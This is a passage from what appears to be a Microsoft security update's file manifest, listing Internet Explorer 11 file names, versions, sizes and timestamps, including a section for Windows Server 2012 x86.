\nWininet.dll.mui| 11.0.9600.18538| 46,592| 12-Nov-2016| 21:31| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 21:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 21:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 21:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 56,320| 12-Nov-2016| 21:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 57,856| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 49,664| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 49,664| 12-Nov-2016| 19:17| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 54,272| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 47,616| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 49,152| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 55,296| 12-Nov-2016| 21:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 45,056| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,712| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,712| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 53,248| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 39,424| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 35,840| 12-Nov-2016| 21:32| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,176| 12-Nov-2016| 21:31| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 21:31| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,688| 12-Nov-2016| 21:31| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 21:31| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 53,760| 12-Nov-2016| 21:31| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 54,272| 12-Nov-2016| 20:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 54,272| 12-Nov-2016| 20:29| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 20:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 20:29| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 53,248| 12-Nov-2016| 20:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 20:30| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 21-Nov-2019| 03:36| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,688| 12-Nov-2016| 20:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,688| 12-Nov-2016| 20:27| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,176| 12-Nov-2016| 20:28| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,176| 12-Nov-2016| 20:28| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 31,232| 12-Nov-2016| 20:28| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 31,232| 12-Nov-2016| 21:30| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 31,232| 12-Nov-2016| 21:30| Not applicable \nInetcpl.cpl| 11.0.9600.19541| 2,058,752| 24-Oct-2019| 02:32| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 307,200| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 293,888| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 290,304| 10-Jul-2019| 04:52| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 289,280| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 299,008| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 303,104| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 282,112| 10-Jul-2019| 04:49| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 282,112| 10-Jul-2019| 03:58| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 296,960| 10-Jul-2019| 04:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 283,648| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 291,840| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 299,520| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 275,968| 10-Jul-2019| 04:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 290,816| 10-Jul-2019| 04:49| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 293,376| 10-Jul-2019| 04:49| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 296,960| 10-Jul-2019| 04:53| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 258,048| 10-Jul-2019| 04:53| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 256,512| 10-Jul-2019| 04:52| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 289,280| 10-Jul-2019| 04:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 288,256| 10-Jul-2019| 04:53| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 285,184| 10-Jul-2019| 04:53| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 295,424| 10-Jul-2019| 04:53| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 297,472| 10-Jul-2019| 04:52| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 292,864| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 295,424| 10-Jul-2019| 04:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 294,400| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 294,400| 10-Jul-2019| 04:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 292,864| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 290,816| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,816| 21-Nov-2019| 03:36| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 286,208| 10-Jul-2019| 04:50| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 281,600| 10-Jul-2019| 04:43| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 286,720| 10-Jul-2019| 04:43| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 292,352| 10-Jul-2019| 04:42| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 242,176| 10-Jul-2019| 04:43| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 243,200| 10-Jul-2019| 04:53| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 243,200| 10-Jul-2019| 04:50| Not applicable \nJavascriptcollectionagent.dll| 11.0.9600.17416| 60,416| 31-Oct-2014| 02:57| x86 \nUrlmon.dll.mui| 11.0.9600.18378| 46,080| 11-Jun-2016| 20:26| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,176| 11-Jun-2016| 20:24| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 20:23| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,664| 11-Jun-2016| 20:24| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 51,712| 11-Jun-2016| 20:23| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 54,272| 11-Jun-2016| 19:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 19:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 18:10| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,176| 11-Jun-2016| 19:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 47,616| 11-Jun-2016| 19:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 19:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,688| 11-Jun-2016| 20:24| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 45,056| 11-Jun-2016| 19:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 19:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 19:13| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,664| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 39,936| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 39,424| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 47,616| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 47,616| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 51,200| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,688| 11-Jun-2016| 19:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 19:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 50,176| 11-Jun-2016| 19:04| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 19:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 19:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,664| 11-Jun-2016| 19:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 19:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 21-Nov-2019| 03:36| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 19:03| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 19:04| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 19:04| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 19:05| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 35,328| 11-Jun-2016| 19:04| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 35,328| 11-Jun-2016| 20:23| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 35,328| 11-Jun-2016| 20:23| Not applicable \nJsproxy.dll| 11.0.9600.17416| 47,104| 31-Oct-2014| 03:16| x86 \nWininet.dll| 11.0.9600.19572| 4,387,840| 19-Nov-2019| 07:05| x86 \nInetcpl.cpl.mui| 11.0.9600.18817| 114,176| 07-Sep-2017| 21:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 130,560| 07-Sep-2017| 21:09| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 124,928| 07-Sep-2017| 21:10| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 122,880| 07-Sep-2017| 21:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 130,048| 07-Sep-2017| 21:10| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 138,240| 07-Sep-2017| 21:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 114,688| 07-Sep-2017| 21:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18666| 114,688| 16-Apr-2017| 08:51| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 131,584| 07-Sep-2017| 21:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 117,760| 07-Sep-2017| 21:10| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 122,368| 07-Sep-2017| 21:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 134,144| 07-Sep-2017| 21:12| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 107,008| 07-Sep-2017| 21:13| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18838| 123,392| 14-Oct-2017| 08:46| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 127,488| 07-Sep-2017| 21:11| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 128,512| 07-Sep-2017| 21:11| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 88,064| 07-Sep-2017| 21:07| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18838| 82,944| 14-Oct-2017| 08:47| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 125,440| 07-Sep-2017| 21:07| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,392| 07-Sep-2017| 21:07| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 120,320| 07-Sep-2017| 21:10| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 130,560| 07-Sep-2017| 21:07| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 129,024| 07-Sep-2017| 21:07| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 125,952| 07-Sep-2017| 22:26| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 129,024| 07-Sep-2017| 22:26| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 128,000| 07-Sep-2017| 22:25| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,904| 07-Sep-2017| 22:26| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 129,024| 07-Sep-2017| 22:26| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,904| 07-Sep-2017| 22:25| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 124,416| 21-Nov-2019| 03:36| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 121,856| 07-Sep-2017| 20:56| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 115,712| 07-Sep-2017| 21:03| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,904| 07-Sep-2017| 21:04| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 125,440| 07-Sep-2017| 21:04| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 74,752| 07-Sep-2017| 21:04| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 75,776| 07-Sep-2017| 21:09| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 75,776| 07-Sep-2017| 21:10| Not applicable \nIedkcs32.dll| 18.0.9600.19541| 333,312| 24-Oct-2019| 02:32| x86 \nInstall.ins| Not applicable| 464| 19-Nov-2019| 05:36| Not applicable \nIeapfltr.dat| 10.0.9301.0| 616,104| 24-Sep-2013| 02:20| Not applicable \nIeapfltr.dll| 11.0.9600.19572| 710,144| 19-Nov-2019| 07:00| x86 \nLicmgr10.dll| 11.0.9600.17416| 27,136| 31-Oct-2014| 03:03| x86 \nIedvtool.dll| 11.0.9600.19541| 772,608| 24-Oct-2019| 03:24| x86 \nDiagnosticstap.dll| 11.0.9600.17905| 174,592| 15-Jun-2015| 20:52| x86 \nF12tools.dll| 11.0.9600.17905| 255,488| 15-Jun-2015| 20:51| x86 \nMsfeedsbs.dll| 11.0.9600.17416| 52,736| 31-Oct-2014| 02:53| x86 \nMsfeedsbs.mof| Not applicable| 1,574| 21-Aug-2013| 23:49| Not applicable \nMsfeedssync.exe| 11.0.9600.17416| 11,264| 31-Oct-2014| 03:25| x86 \nIeadvpack.dll| 11.0.9600.17416| 112,128| 31-Oct-2014| 03:14| x86 \nIelowutil.exe| 11.0.9600.19404| 221,184| 10-Jul-2019| 03:06| x86 \nIeproxy.dll| 11.0.9600.19541| 301,056| 24-Oct-2019| 02:05| x86 \nIeshims.dll| 11.0.9600.19507| 290,304| 06-Oct-2019| 02:32| x86 \nIexpress.exe| 11.0.9600.17416| 152,064| 31-Oct-2014| 03:27| x86 \nWextract.exe| 11.0.9600.17416| 137,728| 31-Oct-2014| 03:28| x86 \nImgutil.dll| 11.0.9600.17416| 40,448| 31-Oct-2014| 02:24| x86 \nExtexport.exe| 11.0.9600.17416| 25,600| 31-Oct-2014| 03:20| x86 \nJsdbgui.dll| 11.0.9600.18895| 459,776| 02-Jan-2018| 04:27| x86 \nJsprofilerui.dll| 11.0.9600.18895| 579,584| 02-Jan-2018| 04:27| x86 \nMshtmldac.dll| 11.0.9600.19507| 64,000| 06-Oct-2019| 03:16| x86 \nNetworkinspection.dll| 11.0.9600.19404| 1,075,200| 10-Jul-2019| 02:45| x86 \nMsdbg2.dll| 12.0.41202.0| 315,008| 30-Sep-2014| 23:00| x86 \nPdm.dll| 12.0.41202.0| 442,992| 30-Sep-2014| 23:00| x86 \nPdmproxy100.dll| 12.0.41202.0| 99,984| 30-Sep-2014| 23:00| x86 \nIcrav03.rat| Not applicable| 8,798| 24-Sep-2013| 02:25| Not applicable \nMsrating.dll| 11.0.9600.19507| 168,960| 06-Oct-2019| 02:57| x86 \nTicrf.rat| Not applicable| 1,988| 24-Sep-2013| 02:26| Not applicable \nIertutil.dll| 11.0.9600.19541| 2,304,000| 24-Oct-2019| 03:04| x86 \nInseng.dll| 11.0.9600.17416| 91,136| 31-Oct-2014| 02:56| x86 \nVgx.dll| 11.0.9600.19507| 817,664| 06-Oct-2019| 02:57| x86 \nUrl.dll| 11.0.9600.17416| 235,520| 31-Oct-2014| 03:24| x86 \nIeframe.dll.mui| 11.0.9600.19541| 2,066,432| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,120,704| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,075,136| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,063,360| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,313,728| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,390,016| 24-Oct-2019| 04:47| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,033,664| 24-Oct-2019| 04:46| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,032,640| 24-Oct-2019| 04:00| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,307,584| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,255,360| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,061,312| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,325,504| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,019,840| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,070,528| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,082,304| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,307,072| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,170,368| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,153,984| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,291,712| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,283,520| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,051,584| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,301,440| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,093,056| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,075,136| 24-Oct-2019| 04:48| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,298,880| 24-Oct-2019| 04:46| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,094,080| 24-Oct-2019| 04:46| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,316,800| 24-Oct-2019| 04:45| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,305,024| 24-Oct-2019| 04:46| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,278,912| 24-Oct-2019| 04:46| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,286,080| 21-Nov-2019| 03:37| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,059,776| 24-Oct-2019| 04:46| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,315,264| 24-Oct-2019| 04:40| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,278,912| 24-Oct-2019| 04:40| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,324,480| 24-Oct-2019| 04:40| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 2,098,176| 24-Oct-2019| 04:40| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 1,890,304| 24-Oct-2019| 04:44| Not applicable \nIeframe.dll.mui| 11.0.9600.19541| 1,890,304| 24-Oct-2019| 04:44| Not applicable \nIeinstal.exe| 11.0.9600.18921| 475,648| 10-Feb-2018| 05:35| x86 \nInetcomm.dll| 6.3.9600.19572| 880,640| 19-Nov-2019| 07:28| x86 \nInetres.dll| 6.3.9600.16384| 84,480| 22-Aug-2013| 04:14| x86 \n \n## Windows Server 2012\n\n## Internet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nUrlmon.dll| 11.0.9600.19572| 1,331,712| 19-Nov-2019| 07:01| x86 \nIexplore.exe| 11.0.9600.19572| 810,376| 23-Nov-2019| 01:12| x86 \nWininet.dll.mui| 11.0.9600.19572| 46,592| 23-Nov-2019| 01:13| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 01:14| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 01:15| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 01:16| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 56,320| 23-Nov-2019| 01:16| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 57,856| 23-Nov-2019| 01:17| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 01:18| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 01:19| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 01:20| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 55,296| 23-Nov-2019| 01:21| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 45,056| 23-Nov-2019| 01:21| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 01:22| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 01:23| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 53,248| 23-Nov-2019| 01:24| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 39,424| 23-Nov-2019| 01:25| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 01:26| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 01:27| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 01:27| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 01:28| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 01:29| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 53,760| 23-Nov-2019| 01:29| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 01:30| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 01:31| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 01:32| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 01:33| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 53,248| 23-Nov-2019| 01:34| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 01:35| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 01:35| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 01:36| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 01:37| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 01:38| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 01:39| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 01:39| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 01:40| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 01:41| Not applicable \nInetcpl.cpl| 11.0.9600.19572| 2,058,752| 19-Nov-2019| 07:23| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 307,200| 23-Nov-2019| 01:13| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 293,888| 23-Nov-2019| 01:14| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,304| 23-Nov-2019| 01:15| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 289,280| 23-Nov-2019| 01:16| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 299,008| 23-Nov-2019| 01:16| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 303,104| 23-Nov-2019| 01:17| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 282,112| 23-Nov-2019| 02:38| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 296,960| 23-Nov-2019| 01:18| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 283,648| 23-Nov-2019| 01:19| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 291,840| 23-Nov-2019| 01:20| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 299,520| 23-Nov-2019| 01:21| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 275,968| 23-Nov-2019| 01:22| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,816| 23-Nov-2019| 01:22| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 293,376| 23-Nov-2019| 01:23| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 296,960| 23-Nov-2019| 01:24| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 258,048| 23-Nov-2019| 01:25| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 256,512| 23-Nov-2019| 01:25| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 289,280| 23-Nov-2019| 01:27| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 288,256| 23-Nov-2019| 01:27| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 285,184| 23-Nov-2019| 01:28| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 295,424| 23-Nov-2019| 01:29| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 297,472| 23-Nov-2019| 01:30| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 292,864| 23-Nov-2019| 01:31| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 295,424| 23-Nov-2019| 01:31| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 294,400| 23-Nov-2019| 01:32| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 294,400| 23-Nov-2019| 01:33| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 292,864| 23-Nov-2019| 01:34| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,816| 23-Nov-2019| 01:35| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 288,768| 23-Nov-2019| 01:35| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 286,208| 23-Nov-2019| 01:36| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 281,600| 23-Nov-2019| 01:37| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 286,720| 23-Nov-2019| 01:38| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 292,352| 23-Nov-2019| 01:39| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 242,176| 23-Nov-2019| 01:39| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 243,200| 23-Nov-2019| 01:40| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 243,200| 23-Nov-2019| 01:41| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 46,080| 23-Nov-2019| 01:13| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 01:14| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 01:15| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 01:16| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 01:16| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 01:17| Not applicable 